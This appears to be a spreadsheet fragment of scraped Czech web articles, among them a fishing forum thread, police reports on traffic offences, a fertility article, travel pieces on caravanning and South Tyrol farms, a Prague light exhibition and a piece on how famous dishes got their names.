to ta voda smer Elektrarna závlahová Horní Dunajovice 17 ha - bez zmeny (vypusteno 2013, skoro plny stav) alfonz42 - Profil | Po 5.5.2014 12:48:37 Při fyzické kontrole kaluží spadajících pod Rokytnou 3A jsem zjistil závažná pomýlení. Rybářský revír tvoří nádrže: Valovo I a II Horní Kounice 1 ha - KDE NENÍ VODA ASI NEBUDE ANI RYBA Kordula Řešice 1.5 ha - KONTROLA NEPROBĚHLA Kacíř Tavíkovice 4.9 ha požární nádrže Medlice 0.1 ha - U VŠECH KALUŽÍ V KATASTRU MEDLICE JSOU TABULE - OBECNÍ MAJETEK, ZÁKAZ RYBOLOVU rybník Jazírka Višňové 1.2 ha Rouchovanská Rouchovany 9.3 ha závlahová Horní Dunajovice 17 ha Teď by mne zajímalo, jak na takových revírech probíhá hospodaření? Karasák - Profil | Ne 4.12.2011 23:25:34 Zdravím, od roku 2012 bude na rybníku Kacíř v Tavíkovicích platit zákaz lovu v zadní části rybníku celoročně. Doposud to bylo od 1.1. do 31.5. Lustig - Profil | St 30.12.2009 17:11:25 Zdarec nevite nekdo co se bude dit s Kacirem???? Slysel jsem ze by z nej mel byt soukromak,byla by to skoda mam tam krasny ulovky Zdenoss - Profil | Ne 5.4.2009 20:01:46 V sobotu jsem byl na Rouchovanech. Luxusní počasí, skvělej relax. Nicméně ryby vůbec nešly, záběr ani jeden a jen pár drbanců, ale další víkend tam jedu zase a skusím to znova. Věřím, že snad nějakej kapřík přijde. Autor: MRK.cz</t>
  </si>
  <si>
    <t>11610</t>
  </si>
  <si>
    <t>12860</t>
  </si>
  <si>
    <t>20241101_358_3242698369_503d6c66d48d1336378b.html</t>
  </si>
  <si>
    <t>503d6c66d48d1336378b</t>
  </si>
  <si>
    <t>Mladý řidič vyletěl s autem z dálnice. Do rána střízlivěl v policejní cele</t>
  </si>
  <si>
    <t>Mladý řidič vyletěl s autem z dálnice. Do rána střízlivěl v policejní cele D10 - Nárazem do oplocení u dálnice a následně do stromu skončila před půlnocí jízda mladého řidiče. Ten nezvládl řízení, respektive se řízení plně nevěnoval a na 17. kilometru vyletěl z dálnice. Na pomoc mu vyjely všechny záchranné složky. Původní oznámení o zaklínění řidiče se naštěstí nepotvrdilo. Muž za volantem, ročník 1998, podle vyjádření mluvčí Policie ČR Barbory Schneeweissové vyvázl z nehody bez zranění. Hůře ale dopadla jeho dechová zkouška. "Muž nadýchal 2,1 promile alkoholu," uvedla mluvčí. Byl proto převez do cely na policejním oddělení, kde policisté čekají, až vystřízliví, aby ho mohli vyslechnout. V posledních dnech nejde už o několikátý případ opilého řidiče, který způsobil nehodu. Velmi vážné skončila jízda opilce po D10 u Brodců , kde narazil do kolony vozidel před zúžením a těžce zranil jednoho z řidičů. Autor: TOK Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>867</t>
  </si>
  <si>
    <t>675</t>
  </si>
  <si>
    <t>20241101_359_3242691726_d0477d24a0ae5d303814.html</t>
  </si>
  <si>
    <t>d0477d24a0ae5d303814</t>
  </si>
  <si>
    <t>Restaurace Metropol v Českých Budějovicích</t>
  </si>
  <si>
    <t>Restaurace Metropol v Českých Budějovicích Zrekonstruovaná restaurace Metropol působí elegantně a láká na kvalitní českou kuchyni s výborným servisem. Pochutnat si můžete na zvěřině, kachně, steaku nebo “obyčejném” vepřovém mase či kuřeti. Nabízí pouze čerstvé suroviny dle aktuální sezónní nabídky a většinu pokrmů připravují metodou Sous-vide. Multifunkčnost restaurace je vhodná i pro větší množství osob (až pro 250). Součástí restaurace je velká terasa pro příjemné posezení v letních měsících s výhledem na Senovážné náměstí . Točí výhradně Budějovický Budvar a ve vinotéce naleznete kvalitní vína moravská, rakouská a francouzská. Navštívit můžete i Cafe bar (až 40 osob) se širokou nabídkou nápojů (hlavně karibských rumů) a výbornou italskou kávu. Pro své hosty připravují rauty, bankety, svatební hostiny, promoce, oslavy, firemní akce, smuteční hostiny. Jsme schopni zajistit celou akci, včetně nápojů, kávy, teplého buffe, výrobků kuchyně, cukrářských výrobků až pro 1000 osob. Metropol se nachází nedaleko náměstí Přemysla Otakara II. Před restaurací je vám k dispozici velké parkoviště. Počasí: dnes 6 °C Rychlost větru: 1 m/s Oblačnost: 70 % Tlak: 1029 hPa Vlhkost: 64 % Rychlost větru: 0 m/s Tlak: 1028 hPa Vlhkost: 62 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 71 % Rychlost větru: 2 m/s Oblačnost: 4 % Tlak: 1028 hPa Vlhkost: 77 % Rychlost větru: 1 m/s Oblačnost: 13 % Tlak: 1029 hPa Vlhkost: 74 % Rychlost větru: 1 m/s Oblačnost: 5 % Tlak: 1026 hPa Vlhkost: 71 % Rychlost větru: 3 m/s Oblačnost: 15 % Tlak: 1021 hPa Vlhkost: 60 % Rychlost větru: 1 m/s Oblačnost: 68 % Tlak: 1026 hPa Vlhkost: 79 % &amp;lt; &amp;gt; Husa upečená dozlatova podávaná se zelím a knedlíky, ale také další tradiční speciality, jako je například kaldoun, to jsou neodmyslitelné komponenty...</t>
  </si>
  <si>
    <t>20241101_36_3478727146_5302ddb9d6c9d556c2ad.html</t>
  </si>
  <si>
    <t>5302ddb9d6c9d556c2ad</t>
  </si>
  <si>
    <t>Vliv chůze na plodnost? Pravidelnou procházku ocení pánevní dno i&amp;nbsp;psychika, napomáhá také ke kvalitnějším spermiím</t>
  </si>
  <si>
    <t>Shrnutí Vliv chůze na plodnost? Pravidelnou procházku ocení pánevní dno i&amp;nbsp;psychika, napomáhá také ke kvalitnějším spermiím Chůze je velmi účinnou formou pohybu, která přináší celou řadu zdravotních benefitů. Nejde jen o prostředek ke zhubnutí nebo zlepšení kondice, pravidelná chůze může mít také překvapivé účinky na plodnost. Víte, jak pohyb ovlivňuje kvalitu spermií? Jaký vliv má chůze na psychiku? A jak působí na svalstvo v oblasti pánve? Chůze dostane spermie do kondice Pokud chtějí muži zlepšit kvalitu spermií, měli by vedle úpravy stravy, omezení konzumace alkoholu , kofeinu a nikotinu zařadit rovněž pravidelný pohyb. Svižná chůze je aktivita, kterou si může dovolit zařadit do svého denního režimu téměř každý. Je vhodná i pro ty, kteří s pravidelným pohybem teprve začínají nebo třeba trpí obezitou. Ideální je věnovat se jí třikrát až čtyřikrát týdně po dobu 45 minut, a to v tempu, při němž se člověk zadýchá. „ Bylo dokázáno, že přiměřená fyzická aktivita podporuje tvorbu testosteronu. A čím více testosteronu muž v těle má, tím více spermií produkuje. Zároveň se zlepšuje také jejich pohyblivost. Pravidelná svižná chůze tedy může pomoci udržet spermie v kondici,“ vysvětluje IVF specialista MUDr. Martin Maděrka, Ph.D., vedoucí lékař z kliniky REPROMEDA. Pravidelnou procházkou ke klidnější mysli Stres. Stále častěji zmiňovaný faktor neplodnosti, který tím, že zasahuje do širokého spektra procesů v těle, dovede početí blokovat. Jeho působením se totiž vyplavuje hormon stresu kortizol a hormon adrenalin, což v krátkodobých krizových situacích může napomoci podat co nejlepší výkon. Je to přesně ten stres, který člověk pociťuje například před zkouškou nebo třeba sportovním utkáním. Při dlouhodobém působení však může stres narušit hormonální rovnováhu a blokovat ovulaci. Negativně působí též na tvorbu testosteronu a kvalitu spermií. Pokud se často cítíte pod tlakem, zařaďte do své rutiny pravidelnou svižnou procházku, nejlépe v přírodě. Během tohoto pohybu totiž dochází k vyplavování endorfinů, které prokazatelně zlepšují náladu a stres zmírňují. Pravidelná rychlá chůze tak pomůže s odbouráváním úzkosti, zvyšuje odolnost proti stresu, a navíc přispívá k lepšímu spánku. To vše pak ve výsledku pozitivně ovlivňuje samotnou plodnost. Chůze pomáhá správné poloze pánve Každodenní procházky mají vedle pozitivních dopadů na redukci váhy nebo psychické rozpoložení významný vliv na zlepšení držení těla a zpevnění svalstva. To se projeví nejen po estetické stránce, ale také na plodnosti. „Špatné držení těla totiž může například způsobovat či prohlubovat nesprávnou polohu pánve. Její asymetrické postavení pak může nerovnoměrně zatěžovat svaly dna pánevního, jeho vazy a také negativně ovlivňovat prokrvení reprodukčních orgánů,“ říká MUDr. Martin Maděrka. Chůze přirozeně posiluje zádové a břišní svaly, stejně jako zmiňované svaly pánevního dna. Ty jsou velmi důležité, jelikož poskytují oporu děloze, vaječníkům a vejcovodům. Pokud jsou svaly oslabené, může docházet k poklesu těchto orgánů, což může narušovat správné prokrvení. Nemluvě o tom, že správně posílené svalstvo pánevního dna může pomoci předcházet nechtěným únikům moči v těhotenství a přispěje i k hladšímu průběhu porodu. Chůzí proti obezitě Za zásadní faktor neplodnosti odborníci v posledních letech považují obezitu – stav, kdy index tělesné hmotnosti BMI přesáhne hodnotu 30. „Podle aktuálních statistik je obézní přibližně pětina Čechů. Obezita přitom v těle vytváří stav permanentního zánětu, podporuje vysoký krevní tlak nebo rozvoj cukrovky. Mění také kvalitu DNA reprodukčních buněk a negativně ovlivňuje hormony,“ uvádí lékař. „Pokud obézní žena otěhotní, je pro ni těhotenství rizikovější a rovněž u jejího potomka může po celý život hrozit zvýšené riziko obezity, cukrovky nebo kardiovaskulárních onemocnění,“ dodává. Jako nejlepší prostředek pro redukci váhy přitom Světová zdravotnická organizace ( WHO ) doporučuje právě pravidelnou chůzi. Platí to ovšem v případě, že je prováděna nejlépe po dobu 45 minut a v určité intenzitě: aby se člověk zadýchal tak, že ještě během chůze zvládne mluvit, ale již ne zpívat.</t>
  </si>
  <si>
    <t>327</t>
  </si>
  <si>
    <t>315</t>
  </si>
  <si>
    <t>20241101_360_3243092578_8cb87586f75fdbd2b9d5.html</t>
  </si>
  <si>
    <t>8cb87586f75fdbd2b9d5</t>
  </si>
  <si>
    <t>Vydejte se na cestu po tajemstvích evropských karavanových tras</t>
  </si>
  <si>
    <t>Vydejte se na cestu po tajemstvích evropských karavanových tras 01.11.2024 Redakce Pro karavanisty a camper turisty je objevování nových míst součástí životního stylu. Každý kilometr na silnici znamená nová dobrodružství, setkání s různými kulturami a nezapomenutelné zážitky. A právě v Evropě se nachází řada skvostů, které čekají na objevitele s obytnými auty. Nejenom malebné krajiny a historická města, ale také unikátní místa, která svým návštěvníkům nabízejí zážitky, jež jinde nenajdou. Tajemné kempy s historií Mezi nejzajímavější destinace pro karavanisty patří kempy, které mají za sebou pozoruhodnou historii. Například kemp na jihu Francie se nachází v blízkosti míst, kde byla za druhé světové války tajná základna pro spojenecké vojáky. Legendy vyprávějí, že se v noci dají stále zaslechnout útržky vojenské komunikace a šumění, což mnohé návštěvníky láká k prozkoumání. Takový kemp může poskytnout nejen skvělé zázemí pro odpočinek, ale také nezapomenutelnou atmosféru, která evokuje historii. Další z mnoha překvapivých míst představuje malebný rybářský přístav v Portugalsku , kde se nachází kemp s orientací na udržitelnost. Tento kemp nabízí bylinkovou zahradu, kde si návštěvníci mohou sami sklízet ingredience na vlastní pokrmy. Zdejší pláže jsou známé svým klidem a přírodními krásami, což z něj činí ideální místo pro relaxaci a odpočinek po náročném dni na cestách. Scénické trasy pro karavanové putování Jedním z nejžádanějších zážitků pro karavanisty je možnost projet se po některých z nejkrásnějších silnic Evropy . Například Silnice atlantského oceánu v Norsku nabízí dechberoucí výhledy na fjordy a otevřený oceán, zatímco cesty skrze italské Toskánsko vedou k čarokrásným vinicím a středověkým městům. Tyto trasy nejenže zahašují touhu po dobrodružství, ale zároveň umožňují poznání unikátní kultury a gastronomie jednotlivých regionů. Zajímavostí je, že v Evropě existuje celá řada tématických tras navržených speciálně pro karavanisty. Ať už se jedná o trasu vína ve Francii , kterou lemují malebné vinařství, nebo stezku po historických památkách ve Španělsku , každé takové putování představuje nezapomenul hnutelný zážitek. Tím, že se karavanisté pohybují ve vlastním pohodlí, mohou si naplno užít objevování skrytých pokladů, které by jinak snadno přehlédli. Návrat k přírodě a dobrodružství Karavanování také nabízí jedinečnou příležitost mít přírodu na dosah ruky. Mnoho karavanistů se rádo vydává do národních parků, kde mohou trávit dny hikinhem, cyklistikou či prostým užíváním si krásy přírody. A to není vše, mnohdy se mohou setkat s přátelskými zvířaty, jako jsou srnky nebo orli, kteří se stávají součástí jejich cestovatelských vzpomínek. Například ve Švýcarsku existuje kemp, který je obklopen nádhernými horskými vrcholky a nabídkou outdoorových aktivit, včetně paraglidingu a horského lezení, což láká aktivní cestovatele. Unikátnost tohoto místa spočívá nejen ve svých službách, ale také v nekonečná možnost obesékat své vlastní hranice a vyzkoušet si, co vše tato nádherná příroda nabízí. Karavanisté jsou objevitelé, kteří nejenže hledají nová místa, ale také vytvářejí vzpomínky, které přetrvávají celý život. Cestování s obytným autem nemusí být jen o návštěvě známých atrakcí, ale o prožití neobyčejných dobrodružství, která na ně čekají za každou zatáčkou. Autor: Redakce</t>
  </si>
  <si>
    <t>20241101_361_3243314782_9d72fc9d913041e4c636.html</t>
  </si>
  <si>
    <t>9d72fc9d913041e4c636</t>
  </si>
  <si>
    <t>Rychlost? - žádný problém KRAJ - "Dálničáři" z Hořic kontrolovali dodržování rychlostí. O uplynulém víkendu se „dálničáři“ z Hořic zaměřili na kontrolu dodržování nejvyšší dovolené rychlosti na Jičínsku, přičemž odhalili 4 řidiče, kteří si s „rychlostí“ zřejmě nedělají hlavu. V Úbislavicích policisté změřili 63letého řidiče vozidla Audi , který jel mimo obec 156 km/h, přičemž je zde stanovená maximální rychlost 90 km/h. Dalšího 36letého „piráta“ ve vozidle Ford změřili v Robousích, když opět mimo obec „uháněl“ rychlostí 148 km/h. Rychlosti V odpoledních hodináchv sobotu „dálničáři“ v obci na „50tce“ v Podhorním Újezdu změřili řidiče ve Volkswagenu , který se „řítil“ rychlostí 103 km/h, navíc vozidlo nemělo platnou technickou prohlídku. Posledního řidiče zkontrolovali opět v Úbislavicích, když mimo obec jel rychlostí 155 km/h. Všichni řidiči se na výzvu policistů podrobili orientační dechové zkoušce na alkohol s negativním výsledkem. Všem řidičům policisté zadrželi řidičské oprávnění a zakázali další jízdu. Ve správním řízení jim hrozí pokuta od 7 do 25 tisíc korun a zákaz řízení od 6 do 18 měsíců. por. Pižlová Šárka, DiS. 1. listopadu 2024, 10:40 Rychlosti</t>
  </si>
  <si>
    <t>20241101_362_3242606320_e8863add94b10e6987b4.html</t>
  </si>
  <si>
    <t>e8863add94b10e6987b4</t>
  </si>
  <si>
    <t>Ve Žlutých lázních svítí vesmír</t>
  </si>
  <si>
    <t>Ve Žlutých lázních svítí vesmír Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstavu otevře areál od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost Decoled . „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Užijte si spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnejte si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí .</t>
  </si>
  <si>
    <t>250</t>
  </si>
  <si>
    <t>20241101_363_3242624172_fa122eeed8b1a7ab8940.html</t>
  </si>
  <si>
    <t>fa122eeed8b1a7ab8940</t>
  </si>
  <si>
    <t>Pět slavných jídel a tajemství jejich názvu: Palačinky crêpe Suzette na počest královy milenky, steak Wellington podle vojevůdce</t>
  </si>
  <si>
    <t>Pět slavných jídel a tajemství jejich názvu: Palačinky crêpe Suzette na počest královy milenky, steak Wellington podle vojevůdce Zdroj: Freepik, freepik Některé názvy jídel mají dlouhou historii a zajímavý příběh. Pravdivost těchto většinou zábavných jídelních pohádek nelze dokázat, ale ani vyvrátit. Pojďme se podívat pod pokličku těch nejznámějších historek. Slavná jména Jejich název vznikl většinou náhodou a celý příběh pak začal žít vlastním životem. Občas někdo něco přidal, jiný zase ubral. Úplně stejně jako to je u jiných než jídelních historek. Putování za slavnými názvy začněme masem. Přiznejme si, že steaky Chateaubriand nebo Wellington nám chutnají víc než bezejmenný kus svíčkové. Steak Chateaubriand Tento extra silný filet ze svíčkové vděčí za své jméno slavnému spisovateli. Francouzský šlechtic François - René Vicomte de Chateaubriand pracoval v diplomatických službách v Londýně a nápad na tento obrovský steak byl prý z jeho hlavy. Autorství se však spíš přisuzuje jeho šéfkuchaři Montmirelovi. Ten chtěl překonat typické anglické steaky. Luxusní steak ze třetí čtvrtiny hovězí svíčkové , který může vážit i kilogram, se připravuje vcelku a servírují se z něj dvě obrovské porce. Vzhledem k tomu, že nenáročný aristokrat a spisovatel o „svém“ steaku nikdy nenapsal jediné slovo, objevila se další verze. Podle ní byl „otcem“ této pochoutky ne moc známý kuchař Chabrillan a Chateaubriand je prostě jen pouhé zkomolení názvu. Filet Wellington Předem opečený váleček hovězí svíčkové se peče v troubě, obalený šunkou, slaninou, nádivkou ze žampiónů a listovým těstem a je kulinární výzvou i pro zkušené kuchaře. Dva nejznámější příběhy o filetu Wellington se odehrávají dokonce v různém století. Podle jednoho se premiéra uskutečnila na Mezinárodní kuchařské výstavě v Curychu roku 1930, kdy švýcarský šéfkuchař Charles Senne tuto delikatesu připravil speciálně pro tuto akci. Podle druhé historky je filet o více než sto let starší a podával se v roce 1813 v Británii na počest vojvůdce Arthura Wellesleye z Wellingtonu , který porazil napoleonská vojska. Hovězí carpaccio O původu a pojmenování carpaccia je kupodivu jen jeden příběh . Možná i proto, že pochoutka z tence nakrájeného syrového hovězího masa přelitá jemnou majonézou je poměrná „nová“. Zasloužil se o ni benátský restauratér Giuseppe Cipriani . Ve své restauraci Harry's Bar vytvořil Cipriani carpaccio z hovězího masa pro hraběnku Amalii Nani Mocenigo, které lékař doporučil, aby se vyhýbala vařeným masům. Název pokrm dostal po renesančním benátském malíři Vittore Carpacciovi , který často používal kontrast červené a bílé barvy. To se prý Ciprianimu vybavilo, když přemýšlel, jak toto jídlo pojmenuje. Waldorfský salát Salát Waldorf je jednoduše velmi pravděpodobně pojmenován po newyorském hotelu Waldorf , kde jej na konci 19. století poprvé připravil vrchní číšník, švýcarský přistěhovalec Oscar Tschirky . Jiný příběh vypráví, že šlo o kolektivní nápad kuchařů, kteří vytvářeli obědové recepty ve 20. letech 20. století. Vzhledem k tomu, že salát z řapíkatého celeru, vlašských ořechů a hroznového vína s majonézovým dresinkem se objevil v kuchařce už roku 1896, zřejmě platí první alternativa. Crêpe Suzette Britský král Eduard VII . měl zřejmě slabost pro ženy neurozeného původu. Kvůli Wallis Simpsonové se vzdal trůnu po necelém roce panování. V době, kdy byl teprve následníkem trůnu a cestoval po Evropě , charismatický muž a tehdejší celebrita, proslul románky s různými ženami. S velice hezkou dívkou jménem Suzette někdy koncem 20. let povečeřel v restauraci Café de Paris v Monte Carlu . Nervóznímu kuchařskému učni při přípravě palačinek začal hořet pomerančový likér v omáčce, kterou se měly polévat palačinky. Nezbylo nic jiného, že předstírat, že flambování je novou součástí dezertu . A pohotový kuchtík tvrdil, že dezert je pojmenovaný po princi Crêpes Princess. Eduarda dezert uchvátil a vyslovil přání, aby nesl jméno jeho společnice Suzette - Crêpes Suzette. Malá poznámka na závěr: Nervózní kuchtík se jmenoval Henri Charpentier a později se stal osobním kuchařem amerického průmyslníka a bankéře George Rockefellera. Náš tip : Podle našeho video receptu si můžete připravit klasické francouzské palačinky. Francouzské palačinky Zdroje informací: emsa.com: Wie berühmte Speisen zu ihrem Namen kamen toscanaslc.com: Crazy about Carpaccio stejkybejky.cz Steak Chateaubriand Témata carpaccio crepes suzette Jak jíst kaki? Exotické ovoce vzhledem připomíná rajče a je lahodně sladké Pixabay: Tereza Křížková Salát s kaki Zdroj: Toprecepty Maso s kaki Zdroj: Toprecepty Ovocné knedlíky s kaki Zdroj: Toprecepty Štrúdl s kaki Zdroj: Toprecepty Kaki dort Zdroj: Toprecepty Salát s kaki Maso s kaki Ovocné knedlíky s kaki Jaká mouka se dává do bramborových knedlíků? Při správné volbě si zachovají kyprost Toprecepty Bramborové knedlíky Autor: Markéta Vavřinová Autor person Markéta Vavřinová</t>
  </si>
  <si>
    <t>344000</t>
  </si>
  <si>
    <t>300420</t>
  </si>
  <si>
    <t>20241101_364_3242624337_83d97943c133b6c574c1.html</t>
  </si>
  <si>
    <t>83d97943c133b6c574c1</t>
  </si>
  <si>
    <t>Cestou z narozeninové oslavy vyvrátil mladík stopku. Hrozí mu až šestileté vězení</t>
  </si>
  <si>
    <t>Cestou z narozeninové oslavy vyvrátil mladík stopku. Hrozí mu až šestileté vězení Foto: Policie ČR Olomoucký kraj Jeseničtí kriminalisté zahájili trestní stíhání 22letého muže, který je obviněný ze spáchání trestného činu poškození a ohrožení provozu obecně prospěšného zařízení. K události došlo začátkem září v obci Velké Kunětice na Jesenicku. Mladý muž se společně s dalšími zúčastnil narozeninové oslavy svého kamaráda. Pravděpodobně posilněn alkoholem si jako předmět svého zájmu vyhlédl svislou dopravní značku „Stůj, dej přednost v jízdě!“, kterou násilím vytrhl z podstavce. Dopravní značka upravující přednost v jízdě následně upadla mimo vozovku a nemohla tak plnit svůj účel. Obviněnému dle trestního zákoníku hrozí trest odnětí svobody na jeden rok až šest let nebo peněžitý trest. por. Mgr. Ivana Skoupilová Policie ČR Foto: Policie ČR Autor: Pavel Jaňurek Autor person Pavel Jaňurek Rubrika transition_slide Události</t>
  </si>
  <si>
    <t>20241101_365_3242591628_044d3d9a5e25e749161a.html</t>
  </si>
  <si>
    <t>044d3d9a5e25e749161a</t>
  </si>
  <si>
    <t>Tři jihotyrolští červení kohouti aneb Inspirace pro dovolenou na farmě</t>
  </si>
  <si>
    <t>Tři jihotyrolští červení kohouti aneb Inspirace pro dovolenou na farmě Až všeobjímající bukolické sepětí s přírodou, ale vždy originální pojetí. Vybraná kvalita, ale zároveň rodinná atmosféra. Koncept Roter Hahn (Červený kohout), nabízející ubytování na farmách v Jižním Tyrolsku , nejsevernější italské provincii, přináší tyto tři příběhy, tři možnosti, kam se vydat třeba ještě před zimou za hranice běžných dnů. 1. St. Quirinus. Luxus mezi vinicemi, kde se s vínem mluví Caldaro/Kalterersee je nejteplejší výletní zónou horské země. Obklopené vinicemi, které z rovin šplhají i do okolních svahů, denně zahřívaných teplým fénem z jihu, jenž dodává růstu hroznů unikátní podmínku. Však jen nedaleko najdete i Tramin/Termeno… St. Quirinus je patronem hospodářů, už pár let jeho jméno nese farma i vinařství na Oberplanitzer ve výšce 460 metrů. Se sousedním Premstalerhofem tvoří přirozený double. Jeden dům patří matce, druhý synovi s rodinou. Oba prošly před osmi lety atraktivní rekonstrukcí v režii architekta Waltera Angoneseho. A hospodaří tu společně. Ze 14 hektarů pozemků patří 9 vínu a 5 jablkům. „Dříve jsme jen pěstovali víno a dodávali do družstva, teď už děláme i svoje,“ ukazuje Michael Sinn. Roční produkci odhaduje na 65 000 lahví dynamického biovína, bílého a červeného. Co to znamená? Pěstuje ho jen s pomocí přírody. „Když vás bolí v krku, dáte si heřmánkový čaj. Když vidíme, že víno strádá, pomůžeme mu podobně,“ ukazuje jeho 16letá dcera. Otec pak dodá, že na vinné šlahouny s révou mluví a dodává jim pozitivní energii. Vínu v sudech ve sklepě pak dokonce pouští hudbu. Ani dunivého Wagnera nebo Rammsteiny , ale klasiku včetně rozvolněnějšího Smetany. A pak ještě víno uchovává v amforách zakopaných až po hrdlo v zemi, odkud čerpají energii. Za víno sbírá ceny a pomalu nad ním předává vládu. „Syn Robert se vrátil z cest po světě, je mu dvaatřicet a už ho umí líp než já,“ usmívá se a zve na večerní ochutnávku (nejmíň dvaceti druhů vína všeho druhu včetně originálního Lagreinu). Na farmě má čtyři apartmány s rozmáchlým designem a nádhernými výhledy do vinic nad Bolzanem. Blízko jezero na koupání, vedle les s bike traily a vůkol dvoutisícové kopce na túry i výběhy. Před domem bazén, uvnitř wellness se saunou i vířivkou. „Aktivitám se meze nekladou, v neděli vás klidně vezmeme i do práce na brigádu,“ zve na pobyt kdykoliv v roce. 2. Edel-Ansitz. Výhled, který se osm set let nezměnil. Ale od oltáře už můžete na řádnou hostinu Ve svahu daleko od dalších usedlostí, obcí, natož městeček. Ale s až všeobjímajícím rozhledem do okolí pod majestátním masivem Schlernu. Pro bližší navigaci, nedaleko jste na Seiser Almu/Alpe di Siusi, největší náhorní plošině Evropy s kulisou Dolomit . První dojem budí ale asociace z filmového opusu Markéty Lazarové . Dvořiště se dvěma věžičkami, obytné stavení, rozhlehlá stodola… Však záznamy dokládají, že tu základy stály už v roce 1336 a podoba od roku 1662 se zásadně nezměnila. „My jsme tu ve třetí generaci,“ vítá nás Isidor Kompatscher. Ano, místo Kompatsch leží nedaleko… Prohlídku zahájí s pýchou v jedné z věží, která už po staletí slouží jako kaple s oltářem, uváděným jako vyhlášená památka. Nahoře najdete apartmán, ve druhé věži další. O kus dál mají stavení s kuchyní a hofschankem – hostincem. „Vaříme jen někdy ve vybrané časy na objednávku. A zvládneme to většinou ve třech, táta, máma a já, někdy pomůžou příbuzní,“ ukazuje synek Simon. V této sestavě obsáhli i svatbu se sto padesáti hosty. Ty už ovšem usadili do sousední stodoly, která ještě loni sloužila spíš jako odkladiště nepotřebného materiálu. Teď po velkolepé rekonstrukci zde bude muzeum historických zemědělských strojů a zároveň prostory pro hostiny, večírky… „A možná i koncerty, proč ne?“ zazubí se mladík v tričku s deathmetalovými obrázky, s piercingem v uších a potetovanýma rukama. Prostor vypadá úžasně a má originální atmosféru. K tomu výhledy. Hlavně se ale musí postarat o krávy a prasata. „S mlékem je čtyřikrát tolik práce,“ vysvětlují volbu chovu pouze na maso. Mají 55 jalovic, které dostaly jména začínající ve stejném roce tím samým písmenem. Citové vazby si však nemohou příliš připouštět. „Práce, obživa,“ povídá přesvědčivě chlapec. Táta byl po třiceti letech týden na dovolené na Korsice . Syn si vyjede jednou za rok na dva týdny. „Letos do Japonska . Není snadné udržet životní balanc při práci na farmě,“ dodá moudře. 3. Dietrichhof. Ve futuristické jeskyni léčící stres vedle krav Ať už z jedné strany od Brixenu , tak z druhé od Klausenu dáte nohám nebo spojce vašeho vozu zabrat. Při výstupu/výjezdu, ale hlavně sestupu/sjezdu. Návštěva farmy Dietrichhof v 1185 metrech ještě nad Oberschnaudersem ale stojí za to. Začalo to potřebou rekonstrukce maštalí pro krávy. „Spočítali jsme si, že bude lepší postavit úplně nový kravín vedle,“ ukazuje s rázným temperamentem Szilvia Rauterová, paní domu. „A pak jsme se rozhodli proměnit historickou budovu v apartmány,“ dodává. Ani rozpočet k 1,5 milionu eur ji nezviklal. A to ještě před první splátkou bance vypukl covid. „Mléko máte pořád, ne?“ zněla odpověď na žádost o snížení nebo odklad plateb. „Museli jsme si poradit. Lidé sem chodili na lyže, stavili se na kafe. Pak se to rozjelo,“ ukazuje. Magnetem je vskutku unikátní projekt čtyř jakýchsi kobek či jeskyněk se skeletem z hlíny a slámy v patře nad původním chlévem, který sloužil jako seník. 